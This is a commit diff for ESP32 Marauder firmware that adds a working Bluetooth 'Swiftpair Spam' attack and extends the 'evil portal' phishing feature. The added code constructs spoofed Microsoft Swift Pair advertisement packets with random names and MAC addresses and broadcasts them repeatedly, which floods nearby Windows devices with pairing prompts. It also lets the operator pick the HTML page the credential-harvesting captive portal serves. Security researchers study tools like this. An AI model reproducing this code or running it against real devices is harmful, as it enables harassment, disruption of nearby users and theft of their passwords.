Merge pull request #357 from justcallmekoko/develop

Develop

README.md

@@ -3,7 +3,7 @@
 <!---[![Build Status](https://travis-ci.com/justcallmekoko/ESP32Marauder.svg?branch=master)](https://travis-ci.com/justcallmekoko/ESP32Marauder)--->
 <!---Shields/Badges https://shields.io/--->
 
-# ESP32 Marauder v0.13.1
+# ESP32 Marauder v0.13.2
 <p align="center"><img alt="Marauder logo" src="https://github.com/justcallmekoko/ESP32Marauder/blob/master/pictures/marauder3L.jpg?raw=true" width="300"></p>
 <p align="center">
   <b>A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32</b>

esp32_marauder/CommandLine.cpp

@@ -250,6 +250,7 @@ void CommandLine::runCommand(String input) {
     #ifdef HAS_BT
       Serial.println(HELP_BT_SNIFF_CMD);
       Serial.println(HELP_BT_SOUR_APPLE_CMD);
+      Serial.println(HELP_BT_SWIFTPAIR_SPAM_CMD);
       #ifdef HAS_GPS
         Serial.println(HELP_BT_WARDRIVE_CMD);
       #endif
@@ -482,6 +483,7 @@ void CommandLine::runCommand(String input) {
     // AP Scan
     else if (cmd_args.get(0) == EVIL_PORTAL_CMD) {
       int cmd_sw = this->argSearch(&cmd_args, "-c");
+      int html_sw = this->argSearch(&cmd_args, "-w");
 
       if (cmd_sw != -1) {
         String et_command = cmd_args.get(cmd_sw + 1);
@@ -491,6 +493,14 @@ void CommandLine::runCommand(String input) {
             display_obj.clearScreen();
             menu_function_obj.drawStatusBar();
           #endif
+          if (html_sw != -1) {
+            String target_html_name = cmd_args.get(html_sw + 1);
+            evil_portal_obj.target_html_name = target_html_name;
+            Serial.println("Set html file as " + evil_portal_obj.target_html_name);
+          }
+          //else {
+          //  evil_portal_obj.target_html_name = "index.html";
+          //}
           wifi_scan_obj.StartScan(WIFI_SCAN_EVIL_PORTAL, TFT_MAGENTA);
         }
         else if (et_command == "reset") {
@@ -500,7 +510,9 @@ void CommandLine::runCommand(String input) {
 
         }
         else if (et_command == "sethtml") {
-
+          String target_html_name = cmd_args.get(cmd_sw + 2);
+          evil_portal_obj.target_html_name = target_html_name;
+          Serial.println("Set html file as " + evil_portal_obj.target_html_name);
         }
         else if (et_command == "setap") {
 
@@ -784,6 +796,18 @@ void CommandLine::runCommand(String input) {
         Serial.println("Bluetooth not supported");
       #endif
     }
+    else if (cmd_args.get(0) == BT_SWIFTPAIR_SPAM_CMD) {
+      #ifdef HAS_BT
+        Serial.println("Starting Swiftpair Spam attack. Stop with " + (String)STOPSCAN_CMD);
+        #ifdef HAS_SCREEN
+          display_obj.clearScreen();
+          menu_function_obj.drawStatusBar();
+        #endif
+        wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN);
+      #else
+        Serial.println("Bluetooth not supported");
+      #endif
+    }
     // Wardrive
     else if (cmd_args.get(0) == BT_WARDRIVE_CMD) {
       #ifdef HAS_BT

esp32_marauder/CommandLine.h

@@ -78,6 +78,7 @@ const char PROGMEM SSID_CMD[] = "ssid";
 // Bluetooth sniff/scan
 const char PROGMEM BT_SNIFF_CMD[] = "sniffbt";
 const char PROGMEM BT_SOUR_APPLE_CMD[] = "sourapple";
+const char PROGMEM BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair";
 const char PROGMEM BT_WARDRIVE_CMD[] = "btwardrive";
 const char PROGMEM BT_SKIM_CMD[] = "sniffskim";
 
@@ -96,7 +97,7 @@ const char PROGMEM HELP_GPS_DATA_CMD[] = "gpsdata";
 const char PROGMEM HELP_GPS_CMD[] = "gps [-g] <fix/sat/lon/lat/alt/date>";
 
 // WiFi sniff/scan
-const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start]";
+const char PROGMEM HELP_EVIL_PORTAL_CMD[] = "evilportal [-c start [-w html.html]/sethtml <html.html>]";
 const char PROGMEM HELP_SIGSTREN_CMD[] = "sigmon";
 const char PROGMEM HELP_SCANAP_CMD[] = "scanap";
 const char PROGMEM HELP_SCANSTA_CMD[] = "scansta";
@@ -124,6 +125,7 @@ const char PROGMEM HELP_SSID_CMD_B[] = "ssid -r <index>";
 // Bluetooth sniff/scan
 const char PROGMEM HELP_BT_SNIFF_CMD[] = "sniffbt";
 const char PROGMEM HELP_BT_SOUR_APPLE_CMD[] = "sourapple";
+const char PROGMEM HELP_BT_SWIFTPAIR_SPAM_CMD[] = "swiftpair";
 const char PROGMEM HELP_BT_WARDRIVE_CMD[] = "btwardrive [-c]";
 const char PROGMEM HELP_BT_SKIM_CMD[] = "sniffskim";
 const char PROGMEM HELP_FOOT[] = "==================================";

esp32_marauder/EvilPortal.cpp

@@ -65,7 +65,7 @@ void EvilPortal::setupServer() {
 bool EvilPortal::setHtml() {
   Serial.println("Setting HTML...");
   #ifndef WRITE_PACKETS_SERIAL
-    File html_file = sd_obj.getFile("/index.html");
+    File html_file = sd_obj.getFile("/" + this->target_html_name);
     if (!html_file) {
       #ifdef HAS_SCREEN
         this->sendToDisplay("Could not find /index.html.");

esp32_marauder/EvilPortal.h

@@ -99,6 +99,8 @@ class EvilPortal {
   public:
     EvilPortal();
 
+    String target_html_name = "index.html";
+
     String get_user_name();
     String get_password();
     void addLog(String log, int len);

esp32_marauder/MenuFunctions.cpp

@@ -495,6 +495,7 @@ void MenuFunctions::main(uint32_t currentTime)
           (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
           (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+          (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS))
@@ -552,6 +553,7 @@ void MenuFunctions::main(uint32_t currentTime)
           (wifi_scan_obj.currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_ALL) ||
           (wifi_scan_obj.currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+          (wifi_scan_obj.currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
           (wifi_scan_obj.currentScanMode == BT_SCAN_SKIMMERS) ||
@@ -1419,6 +1421,11 @@ void MenuFunctions::RunSetup()
     this->drawStatusBar();
     wifi_scan_obj.StartScan(BT_ATTACK_SOUR_APPLE, TFT_GREEN);
   });
+  this->addNodes(&bluetoothAttackMenu, "Swiftpair Spam", TFT_CYAN, NULL, KEYBOARD_ICO, [this]() {
+    display_obj.clearScreen();
+    this->drawStatusBar();
+    wifi_scan_obj.StartScan(BT_ATTACK_SWIFTPAIR_SPAM, TFT_CYAN);
+  });
 
   // Device menu
   deviceMenu.parentMenu = &mainMenu;

esp32_marauder/WiFiScan.cpp

@@ -17,6 +17,11 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
       return 0;
 }
 
+extern "C" {
+  uint8_t esp_base_mac_addr[6];
+  esp_err_t esp_ble_gap_set_rand_addr(const uint8_t *rand_addr);
+}
+
 #ifdef HAS_BT
   //ESP32 Sour Apple by RapierXbox
   //Exploit by ECTO-1A
@@ -48,6 +53,37 @@ extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32
     return randomAdvertisementData;
   }
 
+  NimBLEAdvertisementData getSwiftAdvertisementData() {
+    extern WiFiScan wifi_scan_obj;
+    NimBLEAdvertisementData randomAdvertisementData = NimBLEAdvertisementData();
+    const char* display_name = wifi_scan_obj.generateRandomName();
+    uint8_t display_name_len = strlen(display_name);
+
+    uint8_t size = 7 + display_name_len;
+    uint8_t* packet = (uint8_t*)malloc(size);
+    uint8_t i = 0;
+
+    packet[i++] = size - 1; // Size
+    packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
+    packet[i++] = 0x06; // Company ID (Microsoft)
+    packet[i++] = 0x00; // ...
+    packet[i++] = 0x03; // Microsoft Beacon ID
+    packet[i++] = 0x00; // Microsoft Beacon Sub Scenario
+    packet[i++] = 0x80; // Reserved RSSI Byte
+    for (int j = 0; j < display_name_len; j++) {
+      packet[i + j] = display_name[j];
+    }
+    i += display_name_len;
+
+    randomAdvertisementData.addData(std::string((char *)packet, size));
+
+    free(packet);
+
+    free((void*)display_name);
+
+    return randomAdvertisementData;
+  }
+
   class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {
 
       void onResult(BLEAdvertisedDevice *advertisedDevice) {
@@ -447,6 +483,11 @@ void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
       RunSourApple(scan_mode, color);
     #endif
   }
+  else if (scan_mode == BT_ATTACK_SWIFTPAIR_SPAM) {
+    #ifdef HAS_BT
+      RunSwiftpairSpam(scan_mode, color);
+    #endif
+  }
   else if ((scan_mode == BT_SCAN_WAR_DRIVE) ||
            (scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
     #ifdef HAS_BT
@@ -611,6 +652,7 @@ void WiFiScan::StopScan(uint8_t scan_mode)
 
   else if ((currentScanMode == BT_SCAN_ALL) ||
   (currentScanMode == BT_ATTACK_SOUR_APPLE) ||
+  (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
   (currentScanMode == BT_SCAN_WAR_DRIVE) ||
   (currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
   (currentScanMode == BT_SCAN_SKIMMERS))
@@ -1407,6 +1449,46 @@ void WiFiScan::executeSourApple() {
   #endif
 }
 
+const char* WiFiScan::generateRandomName() {
+  const char* charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
+  int len = rand() % 10 + 1; // Generate a random length between 1 and 10
+  char* randomName = (char*)malloc((len + 1) * sizeof(char)); // Allocate memory for the random name
+  for (int i = 0; i < len; ++i) {
+    randomName[i] = charset[rand() % strlen(charset)]; // Select random characters from the charset
+  }
+  randomName[len] = '\0'; // Null-terminate the string
+  return randomName;
+}
+
+void WiFiScan::generateRandomMac(uint8_t* mac) {
+  for (int i = 0; i < 6; i++) {
+    mac[i] = random(0, 255);
+  }
+}
+
+void WiFiScan::executeSwiftpairSpam() {
+  #ifdef HAS_BT
+    uint8_t macAddr[6];
+    generateRandomMac(macAddr);
+
+    esp_base_mac_addr_set(macAddr);
+
+    NimBLEDevice::init("");
+
+    NimBLEServer *pServer = NimBLEDevice::createServer();
+
+    pAdvertising = pServer->getAdvertising();
+
+    NimBLEAdvertisementData advertisementData = getSwiftAdvertisementData();
+    pAdvertising->setAdvertisementData(advertisementData);
+    pAdvertising->start();
+    delay(10);
+    pAdvertising->stop();
+
+    NimBLEDevice::deinit();
+  #endif
+}
+
 void WiFiScan::executeWarDrive() {
   #ifdef HAS_GPS
     if (gps_obj.getGpsModuleStatus()) {
@@ -1781,6 +1863,26 @@ void WiFiScan::RunSourApple(uint8_t scan_mode, uint16_t color) {
   #endif
 }
 
+void WiFiScan::RunSwiftpairSpam(uint8_t scan_mode, uint16_t color) {
+  #ifdef HAS_BT
+    #ifdef HAS_SCREEN
+      display_obj.TOP_FIXED_AREA_2 = 48;
+      display_obj.tteBar = true;
+      display_obj.print_delay_1 = 15;
+      display_obj.print_delay_2 = 10;
+      display_obj.initScrollValues(true);
+      display_obj.tft.setTextWrap(false);
+      display_obj.tft.setTextColor(TFT_BLACK, color);
+      display_obj.tft.fillRect(0,16,240,16, color);
+      display_obj.tft.drawCentreString("Swiftpair Spam",120,16,2);
+      display_obj.touchToExit();
+      display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+    #endif
+
+    this->ble_initialized;
+  #endif
+}
+
 // Function to start running any BLE scan
 void WiFiScan::RunBluetoothScan(uint8_t scan_mode, uint16_t color)
 {
@@ -4125,6 +4227,25 @@ void WiFiScan::main(uint32_t currentTime)
       this->executeSourApple();
     #endif
   }
+  else if (currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) {
+    #ifdef HAS_BT
+      if (currentTime - initTime >= 1000) {
+        initTime = millis();
+        String displayString = "";
+        String displayString2 = "";
+        displayString.concat("Advertising Data...");
+        for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
+          displayString2.concat(" ");
+        #ifdef HAS_SCREEN
+          display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
+          display_obj.showCenterText(displayString2, 160);
+          display_obj.showCenterText(displayString, 160);
+        #endif
+      }
+
+      this->executeSwiftpairSpam();
+    #endif
+  }
   else if (currentScanMode == WIFI_SCAN_WAR_DRIVE) {
     if (currentTime - initTime >= this->channel_hop_delay * 1000)
     {

esp32_marauder/WiFiScan.h

@@ -82,6 +82,7 @@
 #define BT_SCAN_WAR_DRIVE 34
 #define BT_SCAN_WAR_DRIVE_CONT 35
 #define BT_ATTACK_SOUR_APPLE 36
+#define BT_ATTACK_SWIFTPAIR_SPAM 37
 
 #define GRAPH_REFRESH 100
 
@@ -251,7 +252,9 @@ class WiFiScan
     void clearMacHistory();
     void executeWarDrive();
     void executeSourApple();
+    void executeSwiftpairSpam();
     void startWardriverWiFi();
+    void generateRandomMac(uint8_t* mac);
 
     void startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string);
 
@@ -284,6 +287,7 @@ class WiFiScan
     void RunPacketMonitor(uint8_t scan_mode, uint16_t color);
     void RunBluetoothScan(uint8_t scan_mode, uint16_t color);
     void RunSourApple(uint8_t scan_mode, uint16_t color);
+    void RunSwiftpairSpam(uint8_t scan_mode, uint16_t color);
     void RunLvJoinWiFi(uint8_t scan_mode, uint16_t color);
     void RunEvilPortal(uint8_t scan_mode, uint16_t color);
     bool checkMem();
@@ -346,6 +350,7 @@ class WiFiScan
     void main(uint32_t currentTime);
     void StartScan(uint8_t scan_mode, uint16_t color = 0);
     void StopScan(uint8_t scan_mode);
+    const char* generateRandomName();
     //void addLog(String log, int len);
 
     static void getMAC(char *addr, uint8_t* data, uint16_t offset);

esp32_marauder/configs.h

@@ -22,7 +22,7 @@
   //#define XIAO_ESP32_S3
   //// END BOARD TARGETS
 
-  #define MARAUDER_VERSION "v0.13.1"
+  #define MARAUDER_VERSION "v0.13.2"
 
  //// BOARD FEATURES
   #ifdef MARAUDER_M5STICKC